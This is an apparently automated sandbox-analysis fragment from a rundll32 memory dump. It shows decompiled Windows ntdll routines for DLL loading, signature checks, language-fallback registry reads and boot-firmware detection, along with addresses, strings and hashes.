                                                                                            0x04639cc0
                                                                                            0x04639c55
                                                                                            0x045e8927
                                                                                            0x045e8927
                                                                                            0x045e892f
                                                                                            0x045e8933
                                                                                            0x00000000
                                                                                            0x045e88f5
                                                                                            0x045e88f5
                                                                                            0x00000000
                                                                                            0x045e88f7
                                                                                            0x045e88f7
                                                                                            0x045e88fa
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x045e88fa
                                                                                            0x045e88f5
                                                                                            0x045e88f3
                                                                                            0x00000000
                                                                                            0x045e88d5
                                                                                            0x00000000
                                                                                            0x045e88b2
                                                                                            0x045e88c9
                                                                                            0x00000000
                                                                                            0x045e88c9
                                                                                            0x045e887f
                                                                                            0x045e886a
                                                                                            0x045e8857
                                                                                            0x045e8852
                                                                                            0x045e88bf
                                                                                            0x045e88bf
                                                                                            0x045e87aa
                                                                                            0x045e87ad
                                                                                            0x045e87ae
                                                                                            0x045e87b4
                                                                                            0x045e87b5
                                                                                            0x045e87b6
                                                                                            0x045e87b8
                                                                                            0x045e87bd
                                                                                            0x045e87c1
                                                                                            0x045e87f4
                                                                                            0x045e87fa
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x045e87c1
                                                                                            0x00000000

                                                                                            Strings
                                                                                            • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 04639C18
                                                                                            • minkernel\ntdll\ldrsnap.c, xrefs: 04639C28
                                                                                            • LdrpDoPostSnapWork, xrefs: 04639C1E
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                                                            • API String ID: 0-1948996284
                                                                                            • Opcode ID: 1b153dcd96394859b1f97b33b81d4f23f79adfecd735b252ce25313b0e39e320
                                                                                            • Instruction ID: 76e092cb26888de5b5329b2435e6f069e59c0fe656fb0bad1f3e8f150d1786e9
                                                                                            • Opcode Fuzzy Hash: 1b153dcd96394859b1f97b33b81d4f23f79adfecd735b252ce25313b0e39e320
                                                                                            • Instruction Fuzzy Hash: E09104B1A00216AFDF1CEF5AD8819BA73B5FF44344B184469DD05AB250EB70FD06EB90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 98%
                                                                                            			E045E7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                                                            				char _v8;
                                                                                            				intOrPtr _v12;
                                                                                            				intOrPtr _v16;
                                                                                            				intOrPtr _v20;
                                                                                            				char _v24;
                                                                                            				signed int _t73;
                                                                                            				void* _t77;
                                                                                            				char* _t82;
                                                                                            				char* _t87;
                                                                                            				signed char* _t97;
                                                                                            				signed char _t102;
                                                                                            				intOrPtr _t107;
                                                                                            				signed char* _t108;
                                                                                            				intOrPtr _t112;
                                                                                            				intOrPtr _t124;
                                                                                            				intOrPtr _t125;
                                                                                            				intOrPtr _t126;
                                                                                            
                                                                                            				_t107 = __edx;
                                                                                            				_v12 = __ecx;
                                                                                            				_t125 =  *((intOrPtr*)(__ecx + 0x20));
                                                                                            				_t124 = 0;
                                                                                            				_v20 = __edx;
                                                                                            				if(E045ECEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
                                                                                            					_t112 = _v8;
                                                                                            				} else {
                                                                                            					_t112 = 0;
                                                                                            					_v8 = 0;
                                                                                            				}
                                                                                            				if(_t112 != 0) {
                                                                                            					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
                                                                                            						_t124 = 0xc000007b;
                                                                                            						goto L8;
                                                                                            					}
                                                                                            					_t73 =  *(_t125 + 0x34) | 0x00400000;
                                                                                            					 *(_t125 + 0x34) = _t73;
                                                                                            					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
                                                                                            						goto L3;
                                                                                            					}
                                                                                            					 *(_t125 + 0x34) = _t73 | 0x01000000;
                                                                                            					_t124 = E045DC9A4( *((intOrPtr*)(_t125 + 0x18)));
                                                                                            					if(_t124 < 0) {
                                                                                            						goto L8;
                                                                                            					} else {
                                                                                            						goto L3;
                                                                                            					}
                                                                                            				} else {
                                                                                            					L3:
                                                                                            					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
                                                                                            						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
                                                                                            						L8:
                                                                                            						return _t124;
                                                                                            					}
                                                                                            					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
                                                                                            						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
                                                                                            							goto L5;
                                                                                            						}
                                                                                            						_t102 =  *0x46c5780; // 0x0
                                                                                            						if((_t102 & 0x00000003) != 0) {
                                                                                            							E04655510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
                                                                                            							_t102 =  *0x46c5780; // 0x0
                                                                                            						}
                                                                                            						if((_t102 & 0x00000010) != 0) {
                                                                                            							asm("int3");
                                                                                            						}
                                                                                            						_t124 = 0xc0000428;
                                                                                            						goto L8;
                                                                                            					}
                                                                                            					L5:
                                                                                            					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
                                                                                            						goto L8;
                                                                                            					}
                                                                                            					_t77 = _a4 - 0x40000003;
                                                                                            					if(_t77 == 0 || _t77 == 0x33) {
                                                                                            						_v16 =  *((intOrPtr*)(_t125 + 0x18));
                                                                                            						if(E045F7D50() != 0) {
                                                                                            							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                            						} else {
                                                                                            							_t82 = 0x7ffe0384;
                                                                                            						}
                                                                                            						_t108 = 0x7ffe0385;
                                                                                            						if( *_t82 != 0) {
                                                                                            							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                                                                            								if(E045F7D50() == 0) {
                                                                                            									_t97 = 0x7ffe0385;
                                                                                            								} else {
                                                                                            									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                                            								}
                                                                                            								if(( *_t97 & 0x00000020) != 0) {
                                                                                            									E04657016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
                                                                                            								}
                                                                                            							}
                                                                                            						}
                                                                                            						if(_a4 != 0x40000003) {
                                                                                            							L14:
                                                                                            							_t126 =  *((intOrPtr*)(_t125 + 0x18));
                                                                                            							if(E045F7D50() != 0) {
                                                                                            								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                            							} else {
                                                                                            								_t87 = 0x7ffe0384;
                                                                                            							}
                                                                                            							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                                                                            								if(E045F7D50() != 0) {
                                                                                            									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                                            								}
                                                                                            								if(( *_t108 & 0x00000020) != 0) {
                                                                                            									E04657016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
                                                                                            								}
                                                                                            							}
                                                                                            							goto L8;
                                                                                            						} else {
                                                                                            							_v16 = _t125 + 0x24;
                                                                                            							_t124 = E0460A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
                                                                                            							if(_t124 < 0) {
                                                                                            								E045DB1E1(_t124, 0x1490, 0, _v16);
                                                                                            								goto L8;
                                                                                            							}
                                                                                            							goto L14;
                                                                                            						}
                                                                                            					} else {
                                                                                            						goto L8;
                                                                                            					}
                                                                                            				}
                                                                                            			}




















                                                                                            0x046398b9
                                                                                            0x00000000
                                                                                            0x046398b9
                                                                                            0x045e7ea0
                                                                                            0x045e7ea7
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x045e7eac
                                                                                            0x045e7eb1
                                                                                            0x045e7ec6
                                                                                            0x045e7ed0
                                                                                            0x046398cc
                                                                                            0x045e7ed6
                                                                                            0x045e7ed6
                                                                                            0x045e7ed6
                                                                                            0x045e7ede
                                                                                            0x045e7ee3
                                                                                            0x046398e3
                                                                                            0x046398f0
                                                                                            0x04639902
                                                                                            0x046398f2
                                                                                            0x046398fb
                                                                                            0x046398fb
                                                                                            0x04639907
                                                                                            0x0463991d
                                                                                            0x0463991d
                                                                                            0x04639907
                                                                                            0x046398e3
                                                                                            0x045e7ef0
                                                                                            0x045e7f14
                                                                                            0x045e7f14
                                                                                            0x045e7f1e
                                                                                            0x04639946
                                                                                            0x045e7f24
                                                                                            0x045e7f24
                                                                                            0x045e7f24
                                                                                            0x045e7f2c
                                                                                            0x0463996a
                                                                                            0x04639975
                                                                                            0x04639975
                                                                                            0x0463997e
                                                                                            0x04639993
                                                                                            0x04639993
                                                                                            0x0463997e
                                                                                            0x00000000
                                                                                            0x045e7ef2
                                                                                            0x045e7efc
                                                                                            0x045e7f0a
                                                                                            0x045e7f0e
                                                                                            0x04639933
                                                                                            0x00000000
                                                                                            0x04639933
                                                                                            0x00000000
                                                                                            0x045e7f0e
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x045e7eb1

                                                                                            Strings
                                                                                            • minkernel\ntdll\ldrmap.c, xrefs: 046398A2
                                                                                            • LdrpCompleteMapModule, xrefs: 04639898
                                                                                            • Could not validate the crypto signature for DLL %wZ, xrefs: 04639891
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                            • API String ID: 0-1676968949
                                                                                            • Opcode ID: c62dd6ecc2a75ac5f14a8c0c0db8d7c0b000618de5de3e98e689ba309b193a79
                                                                                            • Instruction ID: d87828350a096f28f25577d0235778d95f7b1772a03dacbcb89e50f003f43f85
                                                                                            • Opcode Fuzzy Hash: c62dd6ecc2a75ac5f14a8c0c0db8d7c0b000618de5de3e98e689ba309b193a79
                                                                                            • Instruction Fuzzy Hash: 135100716007819BEB29CF69C844B7AB7E4FB48318F0409A9E8519B3E1E770FD04EB91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 93%
                                                                                            			E045DE620(void* __ecx, short* __edx, short* _a4) {
                                                                                            				char _v16;
                                                                                            				char _v20;
                                                                                            				intOrPtr _v24;
                                                                                            				char* _v28;
                                                                                            				char _v32;
                                                                                            				char _v36;
                                                                                            				char _v44;
                                                                                            				signed int _v48;
                                                                                            				intOrPtr _v52;
                                                                                            				void* _v56;
                                                                                            				void* _v60;
                                                                                            				char _v64;
                                                                                            				void* _v68;
                                                                                            				void* _v76;
                                                                                            				void* _v84;
                                                                                            				signed int _t59;
                                                                                            				signed int _t74;
                                                                                            				signed short* _t75;
                                                                                            				signed int _t76;
                                                                                            				signed short* _t78;
                                                                                            				signed int _t83;
                                                                                            				short* _t93;
                                                                                            				signed short* _t94;
                                                                                            				short* _t96;
                                                                                            				void* _t97;
                                                                                            				signed int _t99;
                                                                                            				void* _t101;
                                                                                            				void* _t102;
                                                                                            
                                                                                            				_t80 = __ecx;
                                                                                            				_t101 = (_t99 & 0xfffffff8) - 0x34;
                                                                                            				_t96 = __edx;
                                                                                            				_v44 = __edx;
                                                                                            				_t78 = 0;
                                                                                            				_v56 = 0;
                                                                                            				if(__ecx == 0 || __edx == 0) {
                                                                                            					L28:
                                                                                            					_t97 = 0xc000000d;
                                                                                            				} else {
                                                                                            					_t93 = _a4;
                                                                                            					if(_t93 == 0) {
                                                                                            						goto L28;
                                                                                            					}
                                                                                            					_t78 = E045DF358(__ecx, 0xac);
                                                                                            					if(_t78 == 0) {
                                                                                            						_t97 = 0xc0000017;
                                                                                            						L6:
                                                                                            						if(_v56 != 0) {
                                                                                            							_push(_v56);
                                                                                            							E046195D0();
                                                                                            						}
                                                                                            						if(_t78 != 0) {
                                                                                            							L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
                                                                                            						}
                                                                                            						return _t97;
                                                                                            					}
                                                                                            					E0461FA60(_t78, 0, 0x158);
                                                                                            					_v48 = _v48 & 0x00000000;
                                                                                            					_t102 = _t101 + 0xc;
                                                                                            					 *_t96 = 0;
                                                                                            					 *_t93 = 0;
                                                                                            					E0461BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
                                                                                            					_v36 = 0x18;
                                                                                            					_v28 =  &_v44;
                                                                                            					_v64 = 0;
                                                                                            					_push( &_v36);
                                                                                            					_push(0x20019);
                                                                                            					_v32 = 0;
                                                                                            					_push( &_v64);
                                                                                            					_v24 = 0x40;
                                                                                            					_v20 = 0;
                                                                                            					_v16 = 0;
                                                                                            					_t97 = E04619600();
                                                                                            					if(_t97 < 0) {
                                                                                            						goto L6;
                                                                                            					}
                                                                                            					E0461BB40(0,  &_v36, L"InstallLanguageFallback");
                                                                                            					_push(0);
                                                                                            					_v48 = 4;
                                                                                            					_t97 = L045DF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
                                                                                            					if(_t97 >= 0) {
                                                                                            						if(_v52 != 1) {
                                                                                            							L17:
                                                                                            							_t97 = 0xc0000001;
                                                                                            							goto L6;
                                                                                            						}
                                                                                            						_t59 =  *_t78 & 0x0000ffff;
                                                                                            						_t94 = _t78;
                                                                                            						_t83 = _t59;
                                                                                            						if(_t59 == 0) {
                                                                                            							L19:
                                                                                            							if(_t83 == 0) {
                                                                                            								L23:
                                                                                            								E0461BB40(_t83, _t102 + 0x24, _t78);
                                                                                            								if(L045E43C0( &_v48,  &_v64) == 0) {
                                                                                            									goto L17;
                                                                                            								}
                                                                                            								_t84 = _v48;
                                                                                            								 *_v48 = _v56;
                                                                                            								if( *_t94 != 0) {
                                                                                            									E0461BB40(_t84, _t102 + 0x24, _t94);
                                                                                            									if(L045E43C0( &_v48,  &_v64) != 0) {
                                                                                            										 *_a4 = _v56;
                                                                                            									} else {
                                                                                            										_t97 = 0xc0000001;
                                                                                            										 *_v48 = 0;
                                                                                            									}
                                                                                            								}
                                                                                            								goto L6;
                                                                                            							}
                                                                                            							_t83 = _t83 & 0x0000ffff;
                                                                                            							while(_t83 == 0x20) {
                                                                                            								_t94 =  &(_t94[1]);
                                                                                            								_t74 =  *_t94 & 0x0000ffff;
                                                                                            								_t83 = _t74;
                                                                                            								if(_t74 != 0) {
                                                                                            									continue;
                                                                                            								}
                                                                                            								goto L23;
                                                                                            							}
                                                                                            							goto L23;
                                                                                            						} else {
                                                                                            							goto L14;
                                                                                            						}
                                                                                            						while(1) {
                                                                                            							L14:
                                                                                            							_t27 =  &(_t94[1]); // 0x2
                                                                                            							_t75 = _t27;
                                                                                            							if(_t83 == 0x2c) {
                                                                                            								break;
                                                                                            							}
                                                                                            							_t94 = _t75;
                                                                                            							_t76 =  *_t94 & 0x0000ffff;
                                                                                            							_t83 = _t76;
                                                                                            							if(_t76 != 0) {
                                                                                            								continue;
                                                                                            							}
                                                                                            							goto L23;
                                                                                            						}
                                                                                            						 *_t94 = 0;
                                                                                            						_t94 = _t75;
                                                                                            						_t83 =  *_t75 & 0x0000ffff;
                                                                                            						goto L19;
                                                                                            					}
                                                                                            				}
                                                                                            			}































                                                                                            0x04635472
                                                                                            0x04635475
                                                                                            0x0463548d
                                                                                            0x04635493
                                                                                            0x046354a9
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x046354ab
                                                                                            0x046354b4
                                                                                            0x046354bc
                                                                                            0x046354c8
                                                                                            0x046354de
                                                                                            0x046354fb
                                                                                            0x046354e0
                                                                                            0x046354e6
                                                                                            0x046354eb
                                                                                            0x046354eb
                                                                                            0x046354de
                                                                                            0x00000000
                                                                                            0x046354bc
                                                                                            0x04635477
                                                                                            0x0463547a
                                                                                            0x04635480
                                                                                            0x04635483
                                                                                            0x04635486
                                                                                            0x0463548b
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0463548b
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04635447
                                                                                            0x04635447
                                                                                            0x04635447
                                                                                            0x04635447
                                                                                            0x0463544e
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04635450
                                                                                            0x04635452
                                                                                            0x04635455
                                                                                            0x0463545a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0463545c
                                                                                            0x0463546a
                                                                                            0x0463546d
                                                                                            0x0463546f
                                                                                            0x00000000
                                                                                            0x0463546f
                                                                                            0x045de70f

                                                                                            Strings
                                                                                            • InstallLanguageFallback, xrefs: 045DE6DB
                                                                                            • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 045DE68C
                                                                                            • @, xrefs: 045DE6C0
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                                            • API String ID: 0-1757540487
                                                                                            • Opcode ID: 8bfde9b06c39fda9f9fffc5994eb7f8fcfceb385329958236895eb717566704e
                                                                                            • Instruction ID: a93bc42f4ec1e6c164601606a562cdb5f0e211629c9512982158cafad52fa58d
                                                                                            • Opcode Fuzzy Hash: 8bfde9b06c39fda9f9fffc5994eb7f8fcfceb385329958236895eb717566704e
                                                                                            • Instruction Fuzzy Hash: 3C519172505395ABD724DF24C440A6BB3E8BF98719F05092EF986D7250FB34F904D7A2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 77%
                                                                                            			E046551BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                            				signed short* _t63;
                                                                                            				signed int _t64;
                                                                                            				signed int _t65;
                                                                                            				signed int _t67;
                                                                                            				intOrPtr _t74;
                                                                                            				intOrPtr _t84;
                                                                                            				intOrPtr _t88;
                                                                                            				intOrPtr _t94;
                                                                                            				void* _t100;
                                                                                            				void* _t103;
                                                                                            				intOrPtr _t105;
                                                                                            				signed int _t106;
                                                                                            				short* _t108;
                                                                                            				signed int _t110;
                                                                                            				signed int _t113;
                                                                                            				signed int* _t115;
                                                                                            				signed short* _t117;
                                                                                            				void* _t118;
                                                                                            				void* _t119;
                                                                                            
                                                                                            				_push(0x80);
                                                                                            				_push(0x46b05f0);
                                                                                            				E0462D0E8(__ebx, __edi, __esi);
                                                                                            				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
                                                                                            				_t115 =  *(_t118 + 0xc);
                                                                                            				 *(_t118 - 0x7c) = _t115;
                                                                                            				 *((char*)(_t118 - 0x65)) = 0;
                                                                                            				 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                                                                            				_t113 = 0;
                                                                                            				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
                                                                                            				 *((intOrPtr*)(_t118 - 4)) = 0;
                                                                                            				_t100 = __ecx;
                                                                                            				if(_t100 == 0) {
                                                                                            					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                                                                            					E045EEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                                            					 *((char*)(_t118 - 0x65)) = 1;
                                                                                            					_t63 =  *(_t118 - 0x90);
                                                                                            					_t101 = _t63[2];
                                                                                            					_t64 =  *_t63 & 0x0000ffff;
                                                                                            					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                                                                            					L20:
                                                                                            					_t65 = _t64 >> 1;
                                                                                            					L21:
                                                                                            					_t108 =  *((intOrPtr*)(_t118 - 0x80));
                                                                                            					if(_t108 == 0) {
                                                                                            						L27:
                                                                                            						 *_t115 = _t65 + 1;
                                                                                            						_t67 = 0xc0000023;
                                                                                            						L28:
                                                                                            						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
                                                                                            						L29:
                                                                                            						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
                                                                                            						E046553CA(0);
                                                                                            						return E0462D130(0, _t113, _t115);
                                                                                            					}
                                                                                            					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
                                                                                            						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
                                                                                            							 *_t108 = 0;
                                                                                            						}
                                                                                            						goto L27;
                                                                                            					}
                                                                                            					 *_t115 = _t65;
                                                                                            					_t115 = _t65 + _t65;
                                                                                            					E0461F3E0(_t108, _t101, _t115);
                                                                                            					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
                                                                                            					_t67 = 0;
                                                                                            					goto L28;
                                                                                            				}
                                                                                            				_t103 = _t100 - 1;
                                                                                            				if(_t103 == 0) {
                                                                                            					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
                                                                                            					_t74 = E045F3690(1, _t117, 0x45b1810, _t118 - 0x74);
                                                                                            					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
                                                                                            					_t101 = _t117[2];
                                                                                            					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                                                                            					if(_t74 < 0) {
                                                                                            						_t64 =  *_t117 & 0x0000ffff;
                                                                                            						_t115 =  *(_t118 - 0x7c);
                                                                                            						goto L20;
                                                                                            					}
                                                                                            					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
                                                                                            					_t115 =  *(_t118 - 0x7c);
                                                                                            					goto L21;
                                                                                            				}
                                                                                            				if(_t103 == 1) {
                                                                                            					_t105 = 4;
                                                                                            					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
                                                                                            					 *((intOrPtr*)(_t118 - 0x70)) = 0;
                                                                                            					_push(_t118 - 0x70);
                                                                                            					_push(0);
                                                                                            					_push(0);
                                                                                            					_push(_t105);
                                                                                            					_push(_t118 - 0x78);
                                                                                            					_push(0x6b);
                                                                                            					 *((intOrPtr*)(_t118 - 0x64)) = E0461AA90();
                                                                                            					 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                                                                            					_t113 = L045F4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
                                                                                            					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
                                                                                            					if(_t113 != 0) {
                                                                                            						_push(_t118 - 0x70);
                                                                                            						_push( *((intOrPtr*)(_t118 - 0x70)));
                                                                                            						_push(_t113);
                                                                                            						_push(4);
                                                                                            						_push(_t118 - 0x78);
                                                                                            						_push(0x6b);
                                                                                            						_t84 = E0461AA90();
                                                                                            						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
                                                                                            						if(_t84 < 0) {
                                                                                            							goto L29;
                                                                                            						}
                                                                                            						_t110 = 0;
                                                                                            						_t106 = 0;
                                                                                            						while(1) {
                                                                                            							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
                                                                                            							 *(_t118 - 0x88) = _t106;
                                                                                            							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
                                                                                            								break;
                                                                                            							}
                                                                                            							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
                                                                                            							_t106 = _t106 + 1;
                                                                                            						}
                                                                                            						_t88 = E0465500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
                                                                                            						_t119 = _t119 + 0x1c;
                                                                                            						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
                                                                                            						if(_t88 < 0) {
                                                                                            							goto L29;
                                                                                            						}
                                                                                            						_t101 = _t118 - 0x3c;
                                                                                            						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
                                                                                            						goto L21;
                                                                                            					}
                                                                                            					_t67 = 0xc0000017;
                                                                                            					goto L28;
                                                                                            				}
                                                                                            				_push(0);
                                                                                            				_push(0x20);
                                                                                            				_push(_t118 - 0x60);
                                                                                            				_push(0x5a);
                                                                                            				_t94 = E04619860();
                                                                                            				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
                                                                                            				if(_t94 < 0) {
                                                                                            					goto L29;
                                                                                            				}
                                                                                            				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
                                                                                            					_t101 = L"Legacy";
                                                                                            					_push(6);
                                                                                            				} else {
                                                                                            					_t101 = L"UEFI";
                                                                                            					_push(4);
                                                                                            				}
                                                                                            				_pop(_t65);
                                                                                            				goto L21;
                                                                                            			}






















                                                                                            0x046551ee
                                                                                            0x046551f1
                                                                                            0x04655301
                                                                                            0x04655310
                                                                                            0x04655315
                                                                                            0x04655318
                                                                                            0x0465531b
                                                                                            0x04655320
                                                                                            0x0465532e
                                                                                            0x04655331
                                                                                            0x00000000
                                                                                            0x04655331
                                                                                            0x04655328
                                                                                            0x04655329
                                                                                            0x00000000
                                                                                            0x04655329
                                                                                            0x046551fa
                                                                                            0x04655235
                                                                                            0x04655236
                                                                                            0x04655239
                                                                                            0x0465523f
                                                                                            0x04655240
                                                                                            0x04655241
                                                                                            0x04655242
                                                                                            0x04655246
                                                                                            0x04655247
                                                                                            0x0465524e
                                                                                            0x04655251
                                                                                            0x04655267
                                                                                            0x04655269
                                                                                            0x0465526e
                                                                                            0x0465527d
                                                                                            0x0465527e
                                                                                            0x04655281
                                                                                            0x04655282
                                                                                            0x04655287
                                                                                            0x04655288
                                                                                            0x0465528a
                                                                                            0x0465528f
                                                                                            0x04655294
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0465529a
                                                                                            0x0465529c
                                                                                            0x0465529e
                                                                                            0x0465529e
                                                                                            0x046552a4
                                                                                            0x046552b0
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x046552ba
                                                                                            0x046552bc
                                                                                            0x046552bc
                                                                                            0x046552d4
                                                                                            0x046552d9
                                                                                            0x046552dc
                                                                                            0x046552e1
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x046552e7
                                                                                            0x046552f4
                                                                                            0x00000000
                                                                                            0x046552f4
                                                                                            0x04655270
                                                                                            0x00000000
                                                                                            0x04655270
                                                                                            0x046551fc
                                                                                            0x046551fd
                                                                                            0x04655202
                                                                                            0x04655203
                                                                                            0x04655205
                                                                                            0x0465520a
                                                                                            0x0465520f
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0465521b
                                                                                            0x04655226
                                                                                            0x0465522b
                                                                                            0x0465521d
                                                                                            0x0465521d
                                                                                            0x04655222
                                                                                            0x04655222
                                                                                            0x0465522d
                                                                                            0x00000000

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID: Legacy$UEFI
                                                                                            • API String ID: 2994545307-634100481
                                                                                            • Opcode ID: aea2a97c4ac75e5d8964725f30670c9d93186842a055b14daa7e6b09de648271
                                                                                            • Instruction ID: 376523d66169112ecafbdb9fd4e9a0b3b6cfa30f41a95d0d731b7191e7ad265b
                                                                                            • Opcode Fuzzy Hash: aea2a97c4ac75e5d8964725f30670c9d93186842a055b14daa7e6b09de648271
                                                                                            • Instruction Fuzzy Hash: D0518F71E00709AFDB24DFA8C944AADBBF8FF48704F54402DE94AEB265F671A941CB50
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 76%
                                                                                            			E045FB944(signed int* __ecx, char __edx) {
                                                                                            				signed int _v8;
                                                                                            				signed int _v16;
                                                                                            				signed int _v20;
                                                                                            				char _v28;
                                                                                            				signed int _v32;
                                                                                            				char _v36;
                                                                                            				signed int _v40;
